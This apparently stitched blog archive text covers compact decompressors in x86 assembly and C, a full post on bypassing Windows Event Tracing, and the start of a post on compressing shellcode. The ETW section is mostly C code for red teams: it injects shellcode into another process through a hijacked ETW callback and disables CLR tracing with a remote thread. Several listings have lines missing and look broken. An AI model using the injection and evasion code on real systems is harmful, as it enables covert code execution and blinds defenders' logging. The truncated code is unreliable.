shl    edx, cl           ; x += (c << i)
pop    edx               ; restore c
cmp    dl, 128           ; if(c < 128) break;
jb     am_exit
cmp    cl, 21            ; i<=21
jbe    am_loop
am_exit:
xchg   eax, ecx          ; ecx = len
pop    eax               ; restore eax
ret
```

## 12.3 BriefLZ

Designed by JΓΈrgen Ibsen and published in 2015. BriefLZ combines fast encoding and decoding with a good compression ratio. Ibsen uses 16-Bit tags instead of 8-Bit to improve performance on 16-bit architectures. It encodes the match reference length and offset using Elias gamma coding. The following size-optimized decoder in x86 assembly is only 92 bytes.

```blz_depack:
_blz_depack:
lea    esi, [esp+32+4]   ;
lodsd
xchg   edi, eax          ; bs.dst = outbuf
lodsd
lea    ebx, [edi+eax]    ; end = bs.dst + outlen
lodsd
xchg   esi, eax          ; bs.src = inbuf
call   blz_init_getbit
blz_getbit:
add    ax, ax            ; tag <<= 1
jnz    blz_exit_getbit   ; continue for all bits
adc    ax, ax            ; carry over previous bit
blz_exit_getbit:
ret
blz_init_getbit:
pop    ebp               ; ebp = blz_getbit
mov    ax, 8000h         ;
blz_literal:
movsb                    ; *out++ = *bs.src++
blz_main:
cmp    edi, ebx          ; while(out < end)
jnb    blz_exit

call   ebp               ; cf = blz_getbit
jnc    blz_literal       ; if(cf==0) goto blz_literal
;
blz_getgamma:
pushfd                   ; save cf
cdq                      ; result = 1
inc    edx
blz_gamma_loop:
call   ebp               ; cf = blz_getbit()
adc    edx, edx          ; result = (result << 1) + cf
call   ebp               ; cf = blz_getbit()
jc     blz_gamma_loop    ; while(cf == 1)

popfd                    ; restore cf
cmovc  ecx, edx          ; ecx = cf ? edx : ecx
cmc                      ; complement carry
jnc    blz_getgamma      ; loop twice

; ofs = blz_getgamma(&bs) - 2;
dec    edx
dec    edx

; len = blz_getgamma(&bs) + 2;
inc    ecx
inc    ecx

; ofs = (ofs << 8) + (uint32_t)*bs.src++ + 1;
shl    edx, 8
mov    dl, [esi]
inc    esi
inc    edx

; ptr = out - ofs;
push   esi
mov    esi, edi
sub    esi, edx
rep    movsb
pop    esi
jmp    blz_main
blz_exit:
; return (out - (uint8_t*)outbuf);
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 12.4 Not Really Vanished (NRV)

Designed by Markus F.X.J. Oberhumer and used in the famous Ultimate Packer for eXecutables (UPX). NRV uses an LZ77 format with Elias gamma coding for the reference match offset and length. The following x86 assembly derived from n2b_d_s1.asm in the UCL library is currently 115 bytes.

```nrv2b_depack:
_nrv2b_depack:
mov    edi, [esp+32+4]   ; output
mov    esi, [esp+32+8]   ; input

xor    ecx, ecx
mul    ecx
dec    edx
mov    al, 0x80

call   init_get_bit
; read next bit from input
jnz    exit_get_bit

lodsb
exit_get_bit:
ret
init_get_bit:
pop    ebp
jmp    nrv2b_main
; copy literal
nrv2b_copy_byte:
movsb
nrv2b_main:
call   ebp
jc     nrv2b_copy_byte

push   1
pop    ebx
nrv2b_match:
call   ebp

call   ebp
jnc    nrv2b_match

sub    ebx, 3
jb     nrv2b_offset

shl    ebx, 8
mov    bl, [esi]
inc    esi
xor    ebx, -1
jz     nrv2b_exit

xchg   edx, ebx
nrv2b_offset:
call   ebp

call   ebp
jnz    nrv2b_copy_bytes

inc    ecx
nrv2b_len:
call   ebp

call   ebp
jnc    nrv2b_len

inc    ecx
inc    ecx
nrv2b_copy_bytes:
cmp    edx, -0xD00
push   esi
lea    esi, [edi + edx]
rep    movsb
pop    esi
jmp    nrv2b_main
nrv2b_exit:
; return depacked length
sub    edi, [esp+32+4]
mov    [esp+28], edi
ret
```

## 12.5 Lempel-Ziv-Markov chain Algorithm (LZMA)

Designed by Igor Pavlov and published in 1998 with the 7zip archiver. Itβs an LZ77 variant with features similar to LZX used for Microsoft CAB files and compressed help (CHM) files. LZMA uses an arithmetic coder to store compressed data as a stream of bits resulting in high compression ratios that inspired the development of Packfire, KKrunchy, and LZOMA, to name a few. Thereβs a description by Charles Bloom in De-obfuscating LZMA and by Matt Mahoney in Data Compression Explained. Alex Ionescu has also published a minimal implementation with very detailed and helpful comments included in the source. Another size-optimized version is available from the UPX LZMA SDK. The arithmetic coder for LZMA usually requires 16KB of RAM and may not be suitable for devices with limited resources. mudlordβs Win32 executable packer called mupack has an x86 implementation.

Although the compression ratio is excellent, and the speed is acceptable for small files. The complexity of the decompressor for only a few additional percents more in the compression ratio didnβt merit an implementation in x86 assembly. Iβd be willing to implement it on a better architecture like ARM64, but not x86. Shrinkler, KKrunchy, and LZOMA all offer ~55% ratios with much smaller RAM and ROM requirements that seem more suitable for executable compression.

## 12.6 LempelβZivβOberhumer-Markov Algorithm (LZOMA)

Designed by Alexandr Efimov and published in 2015. LZOMA is specifically for decompression of the Linux Kernel but is also suitable for decompression of PE or ELF files too. Itβs primarily based on ideas used by LZMA and LZO. It provides fast decompression like LZO, and a simplified LZMA format provides a high compression ratio. The trade-off is slow compression requiring a lot of memory. Itβs possible to improve the compression ratio by using a real entropy encoder, but at the expense of decompression speed. While itβs still only an experimental algorithm and probably needs more testing, the following is a decoder in C and handwritten x86 assembly.

```typedef struct _lzoma_ctx {
uint32_t w;
uint8_t  *src;
} lzoma_ctx;

static uint8_t get_bit(lzoma_ctx *c) {
uint32_t cy, x;

x = c->w;
c->w <<= 1;

// no bits left?
if(c->w == 0) {
x = *(uint32_t*)c->src;
c->src += 4;
// double with carry
c->w = (x << 1) | 1;
}
// return carry bit
return (x >> 31);
}

void lzoma_depack(
void *outbuf,
uint32_t inlen,
const void *inbuf)
{
uint8_t   *out, *ptr, *end;
uint32_t  cf, top, total, len, ofs, x, res;
lzoma_ctx c;

c.w    = 1 << 31;
c.src  = (uint8_t*)inbuf;
out    = (uint8_t*)outbuf;
end    = out + inlen;

// copy first byte
*out++ = *c.src++;
len    = 0;
ofs    = -1;

while(out < end) {
for(;;) {
// if bit carried, break
if(cf = get_bit(&c)) break;
// copy byte
*out++ = *c.src++;
len = 2;
}
// unpack lz
if(len) {
cf = get_bit(&c);
}
// carry?
if(cf) {
len   = 3;
total = out - (uint8_t*)outbuf;
top   = ((total <= 400000) ? 60 : 50);
ofs   = 0;
x     = 256;
res   = *c.src++;

for(;;) {
x += x;
if(x >= (total + top)) {
x -= total;
if(res >= x) {
cf = get_bit(&c);
res = (res << 1) + cf;
res -= x;
}
break;
}
// magic?
if(x & (0x002FFE00 << 1)) {
top = (((top << 3) + top) >> 3);
}
if(res < top) break;

ofs -= top;
total += top;
top <<= 1;
cf = get_bit(&c);
res = (res << 1) + cf;
}
ofs += res + 1;
// long length?
if(ofs >= 5400) len++;
// huge length?
if(ofs >= 0x060000) len++;
// negate
ofs =- ofs;
}

if(get_bit(&c)) {
len += 2;
res = 0;
for(;;) {
cf = get_bit(&c);
res = (res << 1) + cf;
if(!get_bit(&c)) break;
res++;
}
len += res;
} else {
cf = get_bit(&c);
len += cf;
}
ptr = out + ofs;
while(--len) *out++ = *ptr++;
}
}
```

The assembly code doesnβt transfer that well on to x86. It does, however, avoid having to use lots of RAM, which is a plus.

```lzoma_depack:
_lzoma_depack:
lea    esi, [esp+32+4]
lodsd
xchg   edi, eax          ; edi = outbuf
lodsd
xchg   ebp, eax          ; ebp = inlen
add    ebp, edi          ; ebp += out
lodsd
xchg   esi, eax          ; esi = inbuf
pushad                   ; save esi, edi and ebp
call   init_getbit
get_bit:
add    eax, eax          ; c->w <<= 1
jnz    exit_getbit       ; if(c->w == 0)
lodsd                    ; x = *(uint32_t*)c->src;
adc    eax, eax          ; c->w = (x << 1) | 1;
exit_getbit:
ret                      ; return x >> 31;
init_getbit:
pop    ebp               ; ebp = &get_bit
mov    eax, 1 << 31      ; c->w = 1 << 31
cdq                      ; ofs = -1
movsb                    ; *out++ = *src++;
xor    ecx, ecx          ; len = 0
jmp    main_loop
copy_byte:
movsb                    ; *out++ = *c.src++;
mov    cl, 2             ; len = 2
main_loop:
xor    ebx, ebx          ; res = 0

; while(out < end)
jnb    lzoma_exit

; for(;;) {
call   ebp               ; cf = get_bit(&c);
jnc    copy_byte         ; if(cf) break;

; unpack lz
jecxz  skip_lz           ; if(len) {
call   ebp               ;   cf = get_bit(&c);
skip_lz:                     ; }
; carry?
jnc    use_last_offset   ; if(cf) {
mov    cl, 3+2           ;   len = 3
; total = out - (uint8_t*)outbuf
; top = ((total <= 400000) ? 60 : 50;
mov    cl, 50
cmp    edi, 400000
ja     skip_upd
skip_upd:
xor    ebp, ebp          ; ofs = 0
xor    edx, edx          ; x = 256
inc    dh
mov    bl, byte[esi]     ; res = *c.src++
inc    esi
find_loop:                   ; for(;;) {
add    edx, edx          ;   x += x;
; if(x >= (total + top)) {
push   edi               ; save total
add    edi, ecx          ; edi = total + top
cmp    edx, edi          ; cf = (x - (total + top))
pop    edi               ; restore total
jb     upd_len3          ; jump if x is < (total + top)

sub    edx, edi          ; x -= total;
cmp    ebx, edx          ; if(res >= x) {
jb     upd_len2          ; jump if res < x

; cf = get_bit(&c);
adc    ebx, ebx          ; res = (res << 1) + cf;
sub    ebx, edx          ; res -= x;
jmp    upd_len2
upd_len3:
; magic?
; if(x & (0x002FFE00 << 1)) {
test   edx, (0x002FFE00 << 1)
jz     upd_len4

; top = (((top << 3) + top) >> 3);
lea    ecx, [ecx+ecx*8]
shr    ecx, 3
upd_len4:
cmp    ebx, ecx          ; if(res < top) break;
jb     upd_len2

sub    ebp, ecx          ; ofs -= top
add    edi, ecx          ; total += top
add    ecx, ecx          ; top <<= 1

; cf = get_bit(&c);

; res = (res << 1) + cf;
jmp    find_loop
upd_len2:
; ofs = (ofs + res + 1);
lea    ebp, [ebp + ebx + 1]

; if(ofs >= 5400) len++;
cmp    ebp, 5400

; if(ofs >= 0x060000) len++;
cmp    ebp, 0x060000

neg    ebp               ; ofs = -ofs;

mov    [esp+pushad_t._edx], ebp ; save ofs in edx
use_last_offset:
call   ebp               ; if(get_bit(&c)) {
jnc    check_two

add    ecx, 2            ; len += 2
upd_len:                     ; for(res=0;;res++) {
call   ebp               ; cf = get_bit(&c);
adc    ebx, ebx          ; res = (res << 1) + cf;

call   ebp               ; if(!get_bit(&c)) break;
jnc    upd_lenx

inc    ebx               ; res++;
jmp    upd_len
upd_lenx:
add    ecx, ebx          ; len += res
jmp    copy_bytes
check_two:                   ; } else {
call   ebp               ;   cf = get_bit();
adc    ecx, ebx          ;   len += cf
copy_bytes:                  ; }
push   esi               ; save c.src pointer
lea    esi, [edi + edx]  ; ptr = out + ofs
dec    ecx
; while(--len) *out++ = *ptr++;
rep    movsb
pop    esi               ; restore c.src
jmp    main_loop
lzoma_exit:
ret
```

## 12.7 KKrunchy

Designed by Fabian Giesen for the demo group, Farbrausch, KKrunchy comprises two algorithms. The first, developed between 2003 and 2005, is an LZ77 variant with an arithmetic coder published in 2006. The second algorithm developed between 2006 and 2008, borrows ideas from PAQ7 and was published in 2011. Both are slow at compression but acceptable for demo productions and are compact for decompression. Fabian describes both in more detail here, including the βsecret ingredientβ that can improve ratios of 64K intros by up to 10%. In 2011, Farbrausch members published source code for their demo productions made between 2001-2011, including both compressors. A 32-Bit x86 decoder is already available from Fabian. There appears to be a buffer overflow in the compressor that goes unnoticed without address sanitizer. Hereβs an alternate version of the simple depacker used as a reference.

```#ifdef linux
// gcc
#define REV(x) __builtin_bswap32(x)
#else
// msvc
#define REV(x) _byteswap_ulong(x)
#endif

typedef struct _fr_state {
const uint8_t *src;
// range decoder values
uint32_t val, len, pbs[803];
} fr_state;

// decode a bit using range decoder
static int DB(
fr_state *s, int idx, uint32_t flag)
{
uint32_t a, b, c, d, e;

a = s->pbs[idx];
b = (s->len >> 11) * a;
c = (s->val >= b);
d = -c; e = c-1;
s->len = (d & s->len) | (e & b);
a = (d & a) | (e & -a + 2048);
a >>= (5 - flag);
s->pbs[idx] += (a ^ d) + c;
d &= b;
s->val -= d; s->len -= d;
a = (s->len >> 24);
a = a == 0 ? -1 : 0;
b = (a & 0xFF) & *s->src;
d = -a;
s->src += d;
s->val = (s->val << (d << 3)) | b;
s->len = (s->len << (d << 3));
return c;
}

// decode tree
static int DT(
fr_state *s, int p, int bits)
{
int c;

for(c=1; c<bits;) {
c = (c+c) + DB(s, p + c, bits==256);
}
return c - bits;
}

// decode gamma
static int DG(fr_state *s, int flag) {
int     v, x = 1;
uint8_t c = 1;

v = (-flag & (547 - 291)) + 291;

do {
c = (c+c) + DB(s, v+c, 0);
x = (x+x) + DB(s, v+c, 0);
c = (c+c) + (x & 1);
} while(c & 2);

return x;
}

uint32_t fr_depack(
void *outbuf,
const void *inbuf)
{
int      tmp, i, ofs, len, LWM;
uint8_t  *ptr, *out = (uint8_t*)outbuf;
fr_state s;

s.src  = (const uint8_t*)inbuf;
s.len  = ~0;
s.val  = REV(*(uint32_t*)s.src);
s.src += 4;

for(i=0; i<803; i++) s.pbs[i] = 1024;

for(;;) {
LWM = 0;
// decode literal
*out++ = DT(&s, 35, 256);
if(!DB(&s, LWM, 0)) continue;
// decode match
len = 0;
// use previous offset?
if(LWM || !DB(&s, 2, 0)) {
ofs = DG(&s, 0);
if(!ofs) break;

len  = 2;
ofs  = ((ofs - 2) << 4);
tmp  = ((ofs != 0 ? -1 : 0) & 16) + 3;
ofs += DT(&s, tmp, 16) + 1;

len -= (ofs < 2048);
len -= (ofs < 96);
}
LWM  = 1;
len += DG(&s, 1);
ptr  = out - ofs;

while(len--) *out++ = *ptr++;
}
return out - (uint8_t*)outbuf;
}
```

## 13. Results

The following table, while ordered by ratio, is NOT a rank order and shouldnβt be interpreted that way. It wouldnβt be fair to judge the algorithms based on my criteria, that is: lightweight decompressor, high compression ratio, open source. The ratios are based on compressing a 1MB PE file for Windows without any additional trickery.

Algorithm RAM (Bytes) ROM (Bytes) Ratio
LZ77 0 54 32%
ZX7 Mini 0 67 36%
LZSS 0 69 40%
LZ4 0 80 43%
ULZ 0 124 44%
LZE 0 97 45%
ZX7 0 81 46%
MegaLZ 0 117 46%
BriefLZ 0 92 46%
LZSA1 0 96 46%
LZSA2 0 187 50%
NRV2b 0 115 51%
LZOMA 0 238 54%
Shrinkler 4096 235 55%
KKrunchy 3212 639 (compiler generated) 55%
LZMA 16384 1265 (compiler generated) 58%

## 14. Summary

One could surely write a book about compression algorithms used by the Demoscene. And itβs safe to say Iβve only scraped the surface on this subject. For example, there is no analysis of compression and decompression speed of implementations for the x86 or other architectures. My primary concern at the moment is in the compression ratio and code size.

## 15. Acknowledgements

A number of people helped directly or indirectly with this post.

• Tim Bell for LZB and information about the Stac Electronics lawsuit.
• Blueberry for optimization tips and fixing my initial 68K translation of Shrinkler.
• Qkumba for fixing x86 translation, translation of Exomizer and 6502 depackers.
• Trixter for 8088 depackers.
• Introspec for Z80 depackers and impressive knowledge of LZ variations.
• Emmanuel Marty for aPUltra, LZSA, and helping with x86 decoder for aPLib.

## 16. Further Research

To save you time locating information about some of the topics discussed in this post, Iβve included some links to get you started.

## 16.3 Demoscene Productions

This is not a βbest ofβ list or what my favorites are. Itβs mainly from some youtube recommendations and please donβt take offense If I didnβt include your demo. Contact me if you feel Iβve missed any.

## 16.5 Other Compression Algorithms

The following table, while ordered by ratio, is NOT a rank order and shouldnβt be interpreted that way. It wouldnβt be fair to judge the algorithms based on my criteria, which is a lightweight decompressor, high compression ratio, open-source. The compression ratios are from compressing a 1MB PE file for Windows.

## OK/Good (~25-39%)

Library / API / Algorithm Ratio Link
zpack 24% https://github.com/zerkman/zpacker
PPP 27% https://tools.ietf.org/html/rfc1978
LZJB 28% https://github.com/nemequ/lzjb
LZRW1 31% http://ross.net/compression/lzrw1.html
LZ48 31% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
LZ77 32% https://github.com/andyherbert/lz1
LZW 33% https://github.com/vapier/ncompress
LZP1 34% http://www.hugi.scene.org/online/coding/hugi%2012%20-%20colzp.htm
LZ49 35% http://www.cpcwiki.eu/forum/programming/lz48-cruncherdecruncher/
LZ4X 36% https://github.com/encode84/lz4x
QuickLZ 36% http://www.quicklz.com/
ZX7mini 36% https://github.com/antoniovillena/zx7mini
RtlDecompressBuffer (LZNT1) 36% Windows OS
Decompress (Xpress) 37% Windows OS.

## Very Good (40-49%)

Library / API / Algorithm Ratio Link
LZSS 40% https://github.com/kieselsteini/lzss
LZM 41% https://github.com/r-lyeh/stdarc.c
RtlDecompressBuffer (Xpress) 43% Windows OS
BLZ4 43% https://github.com/jibsen/blz4
LZ4Ultra 43% https://github.com/emmanuel-marty/lz4ultra
ULZ 44% https://github.com/encode84/ulz
LZE 45% http://gorry.haun.org/pw/?lze
Decompress (Xpress Huffman) 45% Windows OS
ZX7 45% http://www.worldofspectrum.org/infoseekid.cgi?id=0027996
LZMAT 45% http://www.matcode.com/lzmat.htm
CRUSH 45% https://sourceforge.net/projects/crush/
Hrust 46% https://github.com/specke/ohc
MegaLZ 46% http://os4depot.net/index.php?function=showfile&file=development/cross/megalz.lha
LZSA1 46% https://github.com/emmanuel-marty/lzsa
BriefLZ 46% https://github.com/jibsen/brieflz
apUltra 47% https://github.com/emmanuel-marty/apultra
Pletter5 47% http://www.xl2s.tk/
Pucrunch 48% https://github.com/mist64/pucrunch
SR2 48% http://mattmahoney.net/dc/#sr2

## Excellent (50% >)

Library / API / Algorithm Ratio Link
BCRUSH 50% https://github.com/jibsen/bcrush
LZSA2 50% https://github.com/emmanuel-marty/lzsa
RtlDecompressBufferEx (Xpress Huffman) 50% Windows OS
Decompress (MSZip) 51% Windows OS
Exomizer 51% https://bitbucket.org/magli143/exomizer/wiki/Home
aPLib 51% http://ibsensoftware.com/products_aPLib.html
JCALG1 52% https://bitsum.com/portfolio/jcalg1/
NRV2B 52% http://www.oberhumer.com/opensource/ucl/
BALZ 53% https://sourceforge.net/projects/balz/
Decompress (LZMS) 54% Windows OS
LZOMA 54% https://github.com/alef78/lzoma
KKrunchy 55% https://github.com/farbrausch/fr_public
NLZM 55% https://github.com/nauful/NLZM
BCM 55% https://github.com/encode84/bcm
Packfire 57% http://neural.untergrund.net/
LZMA 58% https://www.7-zip.org/sdk.html
PAQ8F 70% http://mattmahoney.net/dc/paq.html

nrv2b

odzhan

modexp

# Another method of bypassing ETW and Process Injection via ETW registration entries.

## 1. Introduction

This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows. Itβs relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck provides an option to list ETW registrations, so whatβs discussed here isnβt all that new. Rather than explain how ETW works and the purpose of it, please refer to a list of links here. For this post, I took inspiration from Hiding your .NET β ETW by Adam Chester that includes a PoC for EtwEventWrite. Thereβs also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here.

## 2. Registering Providers

At a high-level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function and an optional callback context.

Registration handles are the memory address of an entry combined with table index shifted left by 48-bits. This may be used later with EventUnregister to disable tracing. The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for.

```typedef struct _ETW_USER_REG_ENTRY {
RTL_BALANCED_NODE   RegList;           // List of registration entries
GUID                ProviderId;        // GUID to identify Provider
PETWENABLECALLBACK  Callback;          // Callback function executed in response to NtControlTrace
PVOID               CallbackContext;   // Optional context
SRWLOCK             RegLock;           //
SRWLOCK             NodeLock;          //
HANDLE              ReplyHandle;       // Used to communicate with the kernel via NtTraceEvent
USHORT              RegIndex;          // Index in EtwpRegistrationTable
USHORT              RegType;           // 14th bit indicates a private
ULONG64             Unknown[19];
} ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY;
```

ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable.

## 3. Locating the Registration Table

A number of functions reference it, but none are public.

• EtwpRemoveRegistrationFromTable
• EtwpGetNextRegistration
• EtwpFindRegistration
• EtwpInsertRegistration

Since we know the type of structures to look for in memory, a good old brute force search of the .data section in ntdll.dll is enough to find it.

```LPVOID etw_get_table_va(VOID) {
LPVOID                m, va = NULL;
DWORD                 i, cnt;
PULONG_PTR            ds;
PRTL_RB_TREE          rbt;
PETW_USER_REG_ENTRY   re;

m   = GetModuleHandle(L"ntdll.dll");

// locate the .data segment, save VA and number of pointers
if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
break;
}
}

// For each pointer minus one
for(i=0; i<cnt - 1; i++) {
rbt = (PRTL_RB_TREE)&ds[i];
// Skip pointers that aren't heap memory
if(!IsHeapPtr(rbt->Root)) continue;

// It might be the registration table.
// Check if the callback is code
re = (PETW_USER_REG_ENTRY)rbt->Root;
if(!IsCodePtr(re->Callback)) continue;

// Save the virtual address and exit loop
va = &ds[i];
break;
}
return va;
}
```

## 4. Parsing the Registration Table

ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with exception to private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API which internally queries WMI.

```Node        : 00000267F0961D00
GUID        : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime)
Description : Microsoft .NET Runtime Common Language Runtime - WorkStation
Callback    : 00007FFC7AB4B5D0 : clr!McGenControlCallbackV2
Context     : 00007FFC7B0B3130 : clr!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context
Index       : 108
Reg Handle  : 006C0267F0961D00
```

## 5. Code Redirection

The Callback function for a provider is invoked in request by the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke a new callback using the StartTrace and EnableTraceEx API, although there may be a simpler way via NtTraceControl.

```// inject shellcode into process using ETW registration entry
BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) {
RTL_RB_TREE             tree;
PVOID                   etw, pdata, cs, callback;
HANDLE                  hp;
SIZE_T                  rd, wr;
ETW_USER_REG_ENTRY      re;
PRTL_BALANCED_NODE      node;
OLECHAR                 id[40];
TRACEHANDLE             ht;
DWORD                   plen, bufferSize;
PWCHAR                  name;
PEVENT_TRACE_PROPERTIES prop;
BOOL                    status = FALSE;
const wchar_t           etwname[]=L"etw_injection\0";

if(path == NULL) return FALSE;

// try read shellcode into memory
if(plen == 0) {
wprintf(L"ERROR: Unable to read shellcode from %s\n", path);
return FALSE;
}

// try obtain the VA of ETW registration table
etw = etw_get_table_va();

if(etw == NULL) {
wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n");
return FALSE;
}

printf("*********************************************\n");
printf("EtwpRegistrationTable for %i found at %p\n", pid, etw);

// try open target process
hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

if(hp == NULL) {
xstrerror(L"OpenProcess(%ld)", pid);
return FALSE;
}

// use (Microsoft-Windows-User-Diagnostic) unless specified

node = etw_get_reg(
hp,
etw,
prov != NULL ? prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}",
&re);

if(node != NULL) {
// convert GUID to string and display name
StringFromGUID2(&re.ProviderId, id, sizeof(id));
name = etw_id2name(id);

wprintf(L"Address of remote node  : %p\n", (PVOID)node);
wprintf(L"Using %s (%s)\n", id, name);

// allocate memory for shellcode
cs = VirtualAllocEx(
hp, NULL, plen,
MEM_COMMIT | MEM_RESERVE,

if(cs != NULL) {
wprintf(L"Address of old callback : %p\n", re.Callback);
wprintf(L"Address of new callback : %p\n", cs);

// write shellcode
WriteProcessMemory(hp, cs, pdata, plen, &wr);

// initialize trace
bufferSize = sizeof(EVENT_TRACE_PROPERTIES) +
sizeof(etwname) + 2;

prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize);
prop->Wnode.BufferSize    = bufferSize;
prop->Wnode.ClientContext = 2;
prop->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
prop->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
prop->LogFileNameOffset   = 0;
prop->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);

if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) {
// save callback
callback = re.Callback;
re.Callback = cs;

// overwrite existing entry with shellcode address
WriteProcessMemory(hp,
(PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback),
&cs, sizeof(ULONG_PTR), &wr);

// trigger execution of shellcode by enabling trace
if(EnableTraceEx(
&re.ProviderId, NULL, ht,
1, TRACE_LEVEL_VERBOSE,
(1 << 16), 0, 0, NULL) == ERROR_SUCCESS)
{
status = TRUE;
}

// restore callback
WriteProcessMemory(hp,
(PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback),
&callback, sizeof(ULONG_PTR), &wr);

// disable tracing
ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP);
} else {
xstrerror(L"StartTrace");
}
LocalFree(prop);
VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
}
} else {
wprintf(L"ERROR: Unable to get registration entry.\n");
}
CloseHandle(hp);
return status;
}
```

## 6. Disable Tracing

If you decide to examine clr!McGenControlCallbackV2 in more detail, youβll see that it changes values in the callback context to enable or disable event tracing. For CLR, the following structure and function are used. Again, this may be defined differently for different versions of the CLR.

```typedef struct _MCGEN_TRACE_CONTEXT {
TRACEHANDLE      RegistrationHandle;
TRACEHANDLE      Logger;
ULONGLONG        MatchAnyKeyword;
ULONGLONG        MatchAllKeyword;
ULONG            Flags;
ULONG            IsEnabled;
UCHAR            Level;
UCHAR            Reserve;
USHORT           EnableBitsCount;
const ULONGLONG* EnableKeyWords;
const UCHAR*     EnableLevel;
} MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT;

void McGenControlCallbackV2(
LPCGUID              SourceId,
ULONG                IsEnabled,
UCHAR                Level,
ULONGLONG            MatchAnyKeyword,
ULONGLONG            MatchAllKeyword,
PVOID                FilterData,
PMCGEN_TRACE_CONTEXT CallbackContext)
{
int cnt;

// if we have a context
if(CallbackContext) {
// and control code is not zero
if(IsEnabled) {
// enable tracing?
if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) {
// set the context
CallbackContext->MatchAnyKeyword = MatchAnyKeyword;
CallbackContext->MatchAllKeyword = MatchAllKeyword;
CallbackContext->Level           = Level;
CallbackContext->IsEnabled       = 1;

// ...other code omitted...
}
} else {
// disable tracing
CallbackContext->IsEnabled       = 0;
CallbackContext->Level           = 0;
CallbackContext->MatchAnyKeyword = 0;
CallbackContext->MatchAllKeyword = 0;

if(CallbackContext->EnableBitsCount > 0) {

4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1));
}
}
EtwCallback(
SourceId, IsEnabled, Level,
MatchAnyKeyword, MatchAllKeyword,
FilterData, CallbackContext);
}
}
```

There are a number of options to disable CLR logging that donβt require patching code.

• Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER.
• Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging.
• Invoke EventUnregister passing in the registration handle.

The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC.

```BOOL etw_disable(
HANDLE             hp,
PRTL_BALANCED_NODE node,
USHORT             index)
{
HMODULE               m;
HANDLE                ht;
CLIENT_ID             cid;
NTSTATUS              nt=~0UL;
REGHANDLE             RegHandle;
EventUnregister_t     pEtwEventUnregister;
ULONG                 Result;

m = GetModuleHandle(L"ntdll.dll");

// create registration handle
RegHandle           = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48);

// execute payload in remote process
printf("  [ Executing EventUnregister in remote process.\n");
nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
NULL, pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid);

printf("  [ NTSTATUS is %lx\n", nt);
WaitForSingleObject(ht, INFINITE);

CloseHandle(ht);

SetLastError(Result);

if(Result != ERROR_SUCCESS) {
xstrerror(L"etw_disable");
return FALSE;
}
disabled_cnt++;
return TRUE;
}
```

## 7. Further Research

I may have missed articles/tools on ETW. Feel free to email me with the details.

clr_etw

odzhan

modexp

# Shellcode: Data Compression

## Introduction

This post examines data compression algorithms suitable for position-independent codes and assumes youβre already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encodeβs Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

1. Compact decompressor.
2. Good compression ratio.
3. Portable across operating systems and architectures.
4. Difficult to detect by signature.
5. Unencumbered by patents and licensing.

Meeting the requirements isnβt that easy. Search for βlightweight compression algorithmsβ and youβll soon find recommendations for algorithms that arenβt compact at all. Itβs not an issue on machines with 1TB hard drives of course. Itβs a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

## 1. Executable Compression

